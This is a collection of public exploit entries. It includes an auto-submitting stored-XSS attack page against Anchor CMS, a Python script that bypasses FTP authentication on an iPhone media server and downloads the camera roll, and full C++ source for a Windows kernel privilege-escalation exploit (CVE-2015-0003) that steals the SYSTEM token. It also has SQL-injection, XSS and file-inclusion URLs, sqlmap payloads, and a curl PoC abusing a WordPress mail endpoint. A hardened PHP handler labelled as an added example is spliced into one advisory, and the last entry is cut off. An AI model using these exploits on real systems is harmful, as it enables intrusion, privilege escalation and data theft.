
source: https://www.securityfocus.com/bid/53181/info

Anchor CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks may also be possible.

Anchor CMS 0.6-14-ga85d0a0 is vulnerable; other versions may also be affected. 

<html>
<head><title>Anchor CMS v0.6 Multiple Persistent XSS Vulnerabilities</title></head>
<body bgcolor="#000000">
<script type="text/javascript">
function xss0(){document.forms["xss0"].submit();}
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
function xss3(){document.forms["xss3"].submit();}
function xss4(){document.forms["xss4"].submit();}
function xss5(){document.forms["xss5"].submit();}
</script>

<form action="http://www.example.com/anchorcms/index.php/admin/users/login" enctype="application/x-www-form-urlencoded" method="POST" id="xss0">
<input type="hidden" name="user" value='"><script>alert(1);</script>' />
<input type="hidden" name="pass" value="admin" />
</form>

<form action="http://www.example.com/anchorcms/index.php/admin/users/amnesia" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="email" value='"><script>alert(1);</script>' />
</form>

<form action="http://www.example.com/anchorcms/index.php/admin/posts/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="comments" value="1" />
<input type="hidden" name="css" value="" />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="html" value="1" />
<input type="hidden" name="js" value="" />
<input type="hidden" name="slug" value='"><script>alert(2);</script>' />
<input type="hidden" name="status" value="published" />
</form>

<form action="http://www.example.com/anchorcms/index.php/admin/pages/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss3">
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="title" value='"><script>alert(2);</script>' />
<input type="hidden" name="content" value="Zero Science Lab" />
<input type="hidden" name="slug" value="ZSL" />
<input type="hidden" name="status" value="published" />
</form>

<form action="http://www.example.com/anchorcms/index.php/admin/users/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss4">
<input type="hidden" name="real_name" value='"><script>alert(1);</script>' />
<input type="hidden" name="bio" value="MK" />
<input type="hidden" name="email" value='"><script>alert(3);</script>' />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="role" value="administrator" />
<input type="hidden" name="status" value="active" />
<input type="hidden" name="username" value='"><script>alert(2);</script>' />
</form>

<form action="http://www.example.com/anchorcms/index.php/admin/metadata" enctype="application/x-www-form-urlencoded" method="POST" id="xss5">
<input type="hidden" name="auto_published_comments" value="1" />
<input type="hidden" name="description" value='"><script>alert(1);</script>' />
<input type="hidden" name="home_page" value="1" />
<input type="hidden" name="posts_page" value="1" />
<input type="hidden" name="posts_per_page" value="1" />
<input type="hidden" name="save" value="" />
<input type="hidden" name="sitename" value='"><script>alert(2);</script>' />
<input type="hidden" name="theme" value="default" />
<input type="hidden" name="twitter" value='"><script>alert(3);</script>' />
</form>

<br /><br />

<a href="javascript: xss0();" style="text-decoration:none">
<b><font color="red"><h3>XSS 0</h3></font></b></a><br />

<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><h3>XSS 1</h3></font></b></a><br />

<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><h3>XSS 2</h3></font></b></a><br />

<a href="javascript: xss3();" style="text-decoration:none">
<b><font color="red"><h3>XSS 3</h3></font></b></a><br />

<a href="javascript: xss4();" style="text-decoration:none">
<b><font color="red"><h3>XSS 4</h3></font></b></a><br />

<a href="javascript: xss5();" style="text-decoration:none">
<b><font color="red"><h3>XSS 5</h3></font></b></a><br />

<a href='http://www.example.com/anchorcms/index.php/"><script>alert(1);</script>'>XSS 6</a>

</body></html>
            
#!/usr/bin/env python
#==================================================================================
# Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service
# Date: 2015-05-25
# Exploit Author: Wh1t3Rh1n0 (Michael Allen)
# Exploit Author's Homepage: http://www.mikeallen.org
# Software Link: https://itunes.apple.com/us/app/ftp-media-server-free/id528962302
# Version: 3.0
# Tested on: iPhone
#==================================================================================
# ------------------
# Denial of Service:
# ------------------
# The FTP server does not properly handle errors raised by invalid 
# FTP commands. The following command, which sends an invalid PORT command to 
# the FTP server, will crash the server once it is received.

# echo -en "PORT\r\n" | nc -nv 192.168.2.5 50000

# ----------------------
# Authentication Bypass:
# ----------------------
# The FTP server does not handle unauthenticated connections or incorrect login
# credentials properly. A remote user can issue commands to the FTP server 
# without authenticating or after entering incorrect credentials.

# The following proof-of-concept connects to the given FTP server and 
# downloads all files stored in the "Camera Roll" folder without providing a
# username or password:

import sys
from ftplib import FTP

# Both host and port are required (the original check let a missing port raise IndexError).
if len(sys.argv) < 3:
    print("Usage: ./ftp-nologin.py [host] [port]")
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

files = []

def append_file(s):
    # Keep the last whitespace-separated token of each LIST line (the file name).
    files.append(s.split(' ')[-1])

blocks = []
def get_blocks(d):
    blocks.append(d)

ftp = FTP()
# Note: no ftp.login() call; the server accepts commands without authentication.
print(ftp.connect(host, port))
ftp.set_pasv(True)
ftp.cwd("Camera Roll")
print(ftp.retrlines('LIST', append_file))

# The first LIST line is not a file entry.
files.pop(0)

for filename in files:
    print("Downloading %s..." % filename)
    ftp.retrbinary('RETR /Camera Roll/' + filename, get_blocks)

    with open(filename, 'wb') as f:
        for block in blocks:
            f.write(block)
    print("[+] File saved to: %s" % filename)

    blocks = []

ftp.quit()
            
// ex.cpp
/*
	Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP
	CVE-2015-0003
	March 2015 (Public Release: May 24, 2015)

	Tested on:
				x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3
				x64: Win 2k8 SP1 | Win 2k8 R2 SP1

	Author: Skylake - skylake <at> mail <dot> com
*/

#include "ex.h"

_ZwAllocateVirtualMemory ZwAllocateVirtualMemory;
_PsLookupProcessByProcessId PsLookupProcessByProcessId;
_PsReferencePrimaryToken PsReferencePrimaryToken;
DWORD Pid;
ATOM atom;
BOOL KrnlMode, bSpawned;

DWORD_PTR WINAPI pti()
{
#ifdef _M_X64
	LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 );
	return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) );
#else
	LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 );
	return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) );
#endif
}

BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize )
{
	DWORD_PTR dwIndex, dwMask;

#ifdef _M_X64
	dwMask = ~0xf;
#else
	dwMask = ~7;
#endif
	//
	dwCurrentValue &= dwMask;

	for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ )
	{
		if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue )
		{
			//
			pdwStructure[dwIndex] = dwNewValue;
			return TRUE;
		}
	}

	return FALSE;
}

BOOL WINAPI Init()
{
	HMODULE hMod = NULL;
	PVOID Base = NULL;
	OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) };
	PSYSTEM_MODULE_INFORMATION pm = NULL;
	BOOL RetVal = FALSE;

	__try {

		if( !GetVersionEx( &ov ) ) __leave;

		if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 )
		{
			atom = 0xc039;
		}

		else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 )
		{
			atom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a;
		}

		if( !atom ) __leave;

		_ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" );
		if( !ZwQuerySystemInformation ) __leave;

		ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" );
		if( !ZwAllocateVirtualMemory ) __leave;

		ULONG len;
		LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len );
		if( !status ) __leave;

		pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len );
		if( !pm ) __leave;
		status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len );
		if( status ) __leave;

		CHAR szKrnl[MAX_PATH] = { 0 }, *t;

		for( ULONG i = 0; i < pm->Count; ++i )
		{
			if( strstr( pm->Module[i].ImageName, "exe" ) )
			{
				t = strstr( pm->Module[i].ImageName, "nt" );
				if( t )
				{
					strcpy_s( szKrnl, _countof( szKrnl ) - 1, t );
					Base = pm->Module[i].Base;
					break;
				}
			}
		}

		hMod = LoadLibraryA( szKrnl );

		if( !hMod || !Base ) __leave;
		
		PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" );
		if( !PsLookupProcessByProcessId ) __leave;

		PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) );

		PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" );

		if( !PsReferencePrimaryToken ) __leave;

		PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) );
		Pid = GetCurrentProcessId();
		RetVal = TRUE;
	}

	__finally {
		if( pm ) LocalFree( pm );
		if( hMod ) FreeLibrary( hMod );
	}

	return RetVal;
}

LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam )
{
	LPVOID pCurProcess = NULL;
	LPVOID pSystemInfo = NULL;
	PACCESS_TOKEN systemToken;
	PACCESS_TOKEN targetToken;

	PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess );
	PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo );

	targetToken = PsReferencePrimaryToken( pCurProcess );
	systemToken = PsReferencePrimaryToken( pSystemInfo );

	//
	find_and_replace_member( ( PDWORD_PTR ) pCurProcess,
		( DWORD_PTR ) targetToken,
		( DWORD_PTR ) systemToken,
		0x200 );
	KrnlMode = TRUE;
	return  0;
}

VOID WINAPI leave()
{
	keybd_event( VK_ESCAPE, 0, 0, NULL );
	keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL );
	keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL );
}

LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam )
{
	if( bSpawned )
	{
		leave();
		ExitProcess( 0 );
	}

	switch( message )
	{
	case WM_CREATE:
		SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL );
		FlashWindow( hWnd, TRUE );
		keybd_event( VK_LWIN, 0, 0, NULL );
		break;
	case WM_CLOSE:
		DestroyWindow( hWnd );
		break;
	case WM_DESTROY:
		PostQuitMessage( 0 );
		break;
	case WM_TIMER:
		KillTimer( hWnd, ID_TIMER );
		leave();
		DestroyWindow( hWnd );
		break;
	default:
		return DefWindowProc( hWnd, message, wParam, lParam );
	}
	return 0;
}

int APIENTRY _tWinMain( _In_ HINSTANCE hInstance,
	_In_opt_ HINSTANCE hPrevInstance,
	_In_ LPTSTR    lpCmdLine,
	_In_ int       nCmdShow )
{
	WNDCLASSEX wc = { sizeof( WNDCLASSEX ) };
	HWND hWnd = NULL;
	MSG Msg = { 0 };

	SIZE_T size = 0x1000;
	LPVOID addr = ( LPVOID ) 1;

	if( !Init() ) return 1;
	
	if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) )
	{
		//
		return 1;
	}

	DWORD_PTR p = pti();
	if( !p ) return 1;

#ifdef _M_X64
	*( ( PDWORD_PTR ) 0x10 ) = p;
	*( ( LPBYTE ) 0x2a ) = 4;
	*( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode;
	*( ( PDWORD_PTR ) 0xa8 ) = 0x400;
	*( ( LPDWORD ) 0x404 ) = 1;
	*( ( PDWORD_PTR ) 0x408 ) = 0x800;
	*( ( LPWORD ) 0x410 ) = atom;
	*( ( LPBYTE ) 0x412 ) = 1;
#else
	*( ( LPDWORD ) 0x08 ) = p;
	*( ( LPBYTE ) 0x16 ) = 4;
	*( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode;
	*( ( LPDWORD ) 0x6c ) = 0x400;
	*( ( LPDWORD ) 0x404 ) = 1;
	*( ( LPDWORD ) 0x408 ) = 0x800;
	*( ( LPWORD ) 0x40c ) = atom;
	*( ( LPBYTE ) 0x40e ) = 1;
#endif

	wc.lpfnWndProc = WndProc;
	wc.hInstance = hInstance;
	wc.lpszClassName = TEXT( "Class" );
	
	if( !RegisterClassEx( &wc ) )
		return 1;
	hWnd = CreateWindowEx(
		WS_EX_CLIENTEDGE,
		TEXT( "Class" ),
		TEXT( "Window" ),
		WS_OVERLAPPEDWINDOW,
		CW_USEDEFAULT, CW_USEDEFAULT, 200, 100,
		NULL, NULL, hInstance, NULL );
	if( !hWnd )
		return 1;
	ShowWindow( hWnd, SW_HIDE );
	UpdateWindow( hWnd );

	while( GetMessage( &Msg, NULL, 0, 0 ) )
	{
		if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010
		{
			if( !KrnlMode )
			{
				Msg.hwnd = ( HWND ) NULL;
			}
			else
			{
				Msg.hwnd = hWnd;
				if( !bSpawned )
				{
					ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW );
					bSpawned = TRUE;
				}
			}
		}

		TranslateMessage( &Msg );
		DispatchMessage( &Msg );
	}

	return ( int ) Msg.wParam;
}
// EOF

//ex.h

#pragma once

#include <windows.h>
#include <stdio.h>
#include <tchar.h>

typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) (
	_In_    HANDLE    ProcessHandle,
	_Inout_ PVOID     *BaseAddress,
	_In_    ULONG_PTR ZeroBits,
	_Inout_ PSIZE_T   RegionSize,
	_In_    ULONG     AllocationType,
	_In_    ULONG     Protect
	);

typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) (
	_In_  HANDLE ProcessId,
	_Out_ PVOID  *Process
	);

typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) (
	_Inout_ PVOID Process
	);

typedef enum _SYSTEM_INFORMATION_CLASS {
	SystemBasicInformation = 0,
	SystemModuleInformation = 11
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) (
	_In_      SYSTEM_INFORMATION_CLASS SystemInformationClass,
	_Inout_   PVOID                    SystemInformation,
	_In_      ULONG                    SystemInformationLength,
	_Out_opt_ PULONG                   ReturnLength
	);

typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
	HANDLE Section;
	PVOID  MappedBase;
	PVOID  Base;
	ULONG  Size;
	ULONG  Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT PathLength;
	CHAR   ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {
	ULONG Count;
	SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

#define ID_TIMER    0x1
#define WM_SYSTIMER 0x118
// EOF
            
source: https://www.securityfocus.com/bid/53202/info

Waylu CMS is prone to an SQL-injection vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible. 

HTML Injection

http://www.example.com/WebApps/products_xx.php?id=[XSS]

SQL Injection

http://www.example.com/WebApps/products_xx.php?id=[SQL Injection] 
            
source: https://www.securityfocus.com/bid/53208/info

The CCNewsLetter module for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CCNewsLetter 1.0.7 is vulnerable; prior versions may also be affected. 

 http://www.example.com/modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] 
            
source: https://www.securityfocus.com/bid/53237/info

The Video Gallery component for Joomla! is prone to local file-include and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the affected application. Information harvested may aid in further attacks.

The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control. 

http://www.example.com/index.php?option=com_videogallery&Itemid=68'

http://www.example.com/index.php?option=com_videogallery&Itemid=[id]' [ SQLi Here ]--

http://www.example.com/&controller=../../../../../../../../../../../../[LFT]%00 
            
source: https://www.securityfocus.com/bid/53268/info

concrete5 is prone to information-disclosure, SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to harvest sensitive information, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.

concrete5 5.5.2.1 is vulnerable; other versions may also be affected. 

http://www.example.com/concrete5.5.2.1/index.php/tools/required/edit_collection_popup.php?approveImmediately=%22%3e%3cimg%20src%3dx%20onerror%3dalert(123123123)%3e&cID=102&ctask=edit_metadata

http://www.example.com/concrete5.5.2.1/index.php?cID=121&bID=38&arHandle=Main&ccm_token=...:...&btask=''%3b!--"%3cbody%20onload%3dalert(12312312323)%3e%3d%26{()}&method=submit_form 
            
source: https://www.securityfocus.com/bid/53273/info

Quick.CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Quick.CMS 4.0 is vulnerable; other versions may also be affected. 

http://www.example.com/admin/?p=[xss] 
            
source: https://www.securityfocus.com/bid/53269/info

gpEasy is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

gpEasy 2.3.3 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php/Admin_Preferences?gpreq=json&jsoncallback=<h1>test<br>test2<%2fh1> 
            
######################

# Exploit Title : Wordpress Video Gallery 2.8 Unprotected Mail Page

# Exploit Author : Claudio Viviani

# Website Author: http://www.homelab.it
                  http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)

# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery

# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip

# Dork Google: index of "contus-video-gallery"
            

# Date : 2015-04-05

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox         

######################

# Description

 WordPress Video Gallery 2.8 suffers from an unprotected mail page.
 
 This vulnerability can be abused for denial of service, phishing, mail bombing and spam.
 
 The "email" AJAX action is callable by any guest visitor (registered in /contus-video-gallery/hdflvvideoshare.php):
 
  /**
  * Email function
  */
 add_action( 'wp_ajax_email', 'email_function' );
 add_action( 'wp_ajax_nopriv_email', 'email_function' );
 
 function email_function() {
     require_once( dirname( __FILE__ ) . '/email.php' );
     die();
 }

 Any user can send email from /contus-video-gallery/email.php to any recipient.
 
 The variables used to send emails are:
 
 $to   = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL );
 $from = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL );
 $url  = filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL );
 $subject  = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
 $message_content =  filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
 $title    = filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING );
 $referrer = parse_url( $_SERVER['HTTP_REFERER'] );
 $referrer_host = $referrer['scheme'] . '://' . $referrer['host'];
 $pageURL  = 'http';
 
 It assumes that if the supplied Referer header matches the website's own URL, then it is okay to send the email:
 
 if ( $referrer_host === $pageURL ) {
     $headers = "MIME-Version: 1.0" . "\r\n";
     $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";	
     $headers .= "From: " . "<" . $from . ">\r\n";
     $headers .= "Reply-To: " . $from . "\r\n";
     $headers .= "Return-path: " . $from;
     $username = explode('@' , $from );   
     $username = ucfirst($username['0']);
     $subject  =  $username . ' has shared a video with you.';
     $emailtemplate_path  = plugin_dir_url( __FILE__ ).'front/emailtemplate/Emailtemplate.html';	
     $message =  file_get_contents( $emailtemplate_path);
     $message = str_replace( '{subject}', $subject, $message );
     $message = str_replace( '{message}', $message_content, $message);
     $message = str_replace( '{videourl}',$url,$message );
     $message = str_replace('{username}',$username ,$message );
     if ( @mail( $to, $title, $message, $headers ) ) {
         echo 'success=sent';
     } else {
         echo 'success=error';
     }
 } else {
     echo 'success=error';
 }
 
 The Referer header is supplied by the client and can easily be set to any value by the attacker!
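The same AJAX handler with the protections the vulnerable version lacks, added here as an example; it is not the plugin's code, and the nonce action name, the "read" capability and the rate-limit values are assumptions:

```php
<?php
// Added example (not the plugin's own code): the "email" AJAX action with the
// checks the vulnerable handler lacked. The nonce action, capability and
// rate-limit values are assumed; the WordPress API calls are real.

// Register the action for logged-in users only: no wp_ajax_nopriv_ hook, so
// anonymous visitors get WordPress's default "0" response instead of a mailer.
add_action( 'wp_ajax_email', 'hardened_email_function' );

function hardened_email_function() {
    // 1. CSRF protection: the request must carry a nonce issued to this user
    //    (the front-end form would embed wp_create_nonce( 'share_video_email' )).
    //    This replaces the Referer comparison, which the client fully controls.
    check_ajax_referer( 'share_video_email', '_wpnonce' );

    // 2. Authorization: only an authenticated account with a capability may send.
    if ( ! current_user_can( 'read' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $to    = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL );
    $url   = filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL );
    $note  = sanitize_textarea_field( (string) filter_input( INPUT_POST, 'Note' ) );
    $title = sanitize_text_field( (string) filter_input( INPUT_POST, 'title' ) );

    if ( ! $to || ! $url ) {
        wp_send_json_error( 'invalid input', 400 );
    }

    // 3. Only share URLs that point back to this site, so the endpoint cannot
    //    be used to push arbitrary phishing links to arbitrary recipients.
    if ( wp_parse_url( $url, PHP_URL_HOST ) !== wp_parse_url( home_url(), PHP_URL_HOST ) ) {
        wp_send_json_error( 'url not allowed', 400 );
    }

    // 4. The sender is the logged-in account, never a request parameter, so
    //    From/Reply-To cannot be chosen by the caller.
    $user = wp_get_current_user();
    $from = $user->user_email;

    // 5. Per-user rate limit via a transient (assumed limit: 5 mails per hour),
    //    which blunts the mail-bombing and spam use of the endpoint.
    $key   = 'share_video_email_' . $user->ID;
    $count = (int) get_transient( $key );
    if ( $count >= 5 ) {
        wp_send_json_error( 'rate limited', 429 );
    }
    set_transient( $key, $count + 1, HOUR_IN_SECONDS );

    // 6. Read the template from disk (the original fetched it over HTTP via
    //    plugin_dir_url) and escape every user-controlled value placed in HTML.
    $template = file_get_contents( plugin_dir_path( __FILE__ ) . 'front/emailtemplate/Emailtemplate.html' );
    $message  = str_replace(
        array( '{subject}', '{message}', '{videourl}', '{username}' ),
        array(
            esc_html( $user->display_name . ' has shared a video with you.' ),
            esc_html( $note ),
            esc_url( $url ),
            esc_html( $user->display_name ),
        ),
        $template
    );

    $headers = array(
        'Content-Type: text/html; charset=UTF-8',
        'Reply-To: ' . $from,
    );

    if ( wp_mail( $to, $title, $message, $headers ) ) {
        wp_send_json_success( 'sent' );
    }
    wp_send_json_error( 'error', 500 );
}
```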

######################

# PoC

 curl -X POST -d "from=attacker@attacker.com&to=victim@victim.com&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \
 -e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email

 The cURL switch "-e" sets a spoofed Referer header.

# Http Response

  success=sent 
  
# Poc Video

http://youtu.be/qgOGPm1-tNc
 

#######################

Discovered By : Claudio Viviani
                http://www.homelab.it
                http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit)
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
				
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
            
# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063

 Vulnerabilities (2)
=====================

(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------

* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
        $where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";
    }
}
+++++++++++++++++++++++++++++++++++++++++

* POC:
http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search

SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
[............]
GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Parameter: where1 (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++


(2) Authenticated XSS [CWE-79] (CVE-2015-4063)
----------------------------------------------

includes/nsp_search.php:128
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }
}
+++++++++++++++++++++++++++++++++++++++++

* POC:
http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search


 Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-19: Vendor notification.
2015-05-19: Vendor response.
2015-05-20: Vendor fix.
2015-05-25: Public disclosure.
            
# Title: Multiple vulnerabilities in WordPress plugin "WordPress Landing Pages"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/landing-pages/
# Active installs: 20,000+
# Vulnerable version: 1.8.4
# Fixed version: 1.8.5
# CVE: CVE-2015-4064, CVE-2015-4065 

 Vulnerabilities (2)
=====================

(1) Authenticated SQLi [CWE-89] (CVE-2015-4064)
-----------------------------------------------

* CODE:
modules/module.ab-testing.php:100
+++++++++++++++++++++++++++++++++++++++++
$wpdb->query("
    SELECT `meta_key`, `meta_value`
    FROM $wpdb->postmeta
    WHERE `post_id` = ".$_GET['post']."
");
+++++++++++++++++++++++++++++++++++++++++

* POC:
http://[domain]/wp-admin/post.php?post=306[SQLi]&action=edit&lp-variation-id=1&ab-action=delete-variation

SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/post.php?post=306&action=edit&lp-variation-id=0&ab-action=delete-variation" -p post
[............]
GET parameter 'post' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 86 HTTP(s) requests:
---
Parameter: post (GET)
   Type: AND/OR time-based blind
   Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
   Payload: post=306 AND (SELECT * FROM (SELECT(SLEEP(10)))sCKL)&action=edit&lp-variation-id=0&ab-action=delete-variation
---
[13:35:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++


(2) Authenticated XSS [CWE-79] (CVE-2015-4065)
----------------------------------------------

* CODE:
shared/shortcodes/inbound-shortcodes.php:761
+++++++++++++++++++++++++++++++++++++++++
<iframe src='<?php echo INBOUDNOW_SHARED_URLPATH . 'shortcodes/'; ?>preview.php?sc=&post=<?php echo $_GET['post']; ?>' width="285" scrollbar='true' frameborder="0" id="inbound-shortcodes-preview"></iframe>
